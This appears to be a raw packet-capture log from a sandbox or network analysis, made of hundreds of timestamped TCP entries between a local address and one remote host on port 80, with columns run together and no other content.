                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324507952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324525118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324539900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324553013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324567080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324584007 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324595928 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324604988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324632883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324656963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324672937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324688911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324695110 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324695110 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324703932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324728966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324748039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324774027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324784994 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324784994 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324790955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324817896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324831009 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324832916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324862957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324872017 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324881077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324897051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324919939 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324923992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324939966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324956894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324970961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324973106 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324990988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.324994087 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.325007915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.325025082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.325041056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.325056076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.325079918 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.325079918 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.325082064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.325099945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.325120926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.325126886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.325131893 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.325143099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.325170040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.325193882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.325196028 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.325207949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.325225115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.325241089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.325263977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.325275898 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.325275898 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.325279951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.325295925 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.325314999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.325329065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.325359106 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.325370073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.325386047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.325402975 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.325412989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.325428009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.325443029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.325453997 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.325489998 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.364414930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.364435911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.364465952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.364483118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.364497900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.364516973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.364533901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.364550114 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.364550114 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.364550114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.364550114 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.364568949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.364586115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.364600897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.364617109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.364630938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.364645958 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.364645958 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.364645958 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.364701986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.364718914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.364732981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.364751101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.364753008 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.364769936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.364787102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.364800930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.364801884 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.364851952 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.364891052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.364908934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.364923954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.364938021 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.364938021 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.365044117 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.395735025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.395761013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.395776987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.395792007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.395811081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.395826101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.395839930 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.395839930 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.395843029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.395859957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.395879030 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.395880938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.395898104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.395946980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.395984888 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.404002905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.404017925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.404042959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.404059887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.404074907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.404092073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.404119968 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.404119968 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.404172897 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.404180050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.404197931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.404215097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.405281067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.405297041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.405312061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.405333996 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.405334949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.405348063 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.405353069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.405358076 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.405369997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.405421019 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.405425072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.405437946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.405453920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.405468941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.405498028 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.405498028 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.424882889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.424904108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.424921036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.424938917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.425127983 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.425127983 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.427481890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.427496910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.427522898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.427540064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.427556992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.427563906 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.427563906 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.427576065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.427592039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.427614927 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.427643061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.427656889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.427671909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.427694082 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.427759886 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.427759886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.427789927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.427805901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428087950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428103924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428121090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428132057 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428132057 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428154945 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428158998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428210020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428211927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428226948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428255081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428270102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428284883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428296089 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428318024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428345919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428356886 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428359985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428390980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428399086 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428405046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428422928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428436995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428446054 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428455114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428478003 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428478003 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428512096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428525925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428554058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428570032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428585052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428601980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428601980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428638935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428641081 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428653955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428682089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428694963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428710938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428736925 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428736925 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428782940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428786039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428798914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428814888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428829908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428845882 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428848028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428857088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428874016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428896904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428914070 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428958893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428975105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.428992033 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429029942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429045916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429060936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429081917 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429089069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429096937 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429107904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429125071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429140091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429146051 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429179907 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429194927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429210901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429225922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429244041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429297924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429297924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429322958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429337978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429353952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429368973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429389954 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429389954 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429394960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429410934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429426908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429442883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429445982 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429461002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429472923 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429532051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429548979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429568052 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429577112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429591894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429608107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429616928 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429624081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429644108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429658890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429666042 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429666042 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429678917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429696083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429713011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429732084 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429742098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429744005 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429759026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429775953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429796934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429800034 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429816008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429831982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429836988 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.429908991 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430056095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430080891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430099010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.430125952 CET804973342.96.10.8192.168.2.4
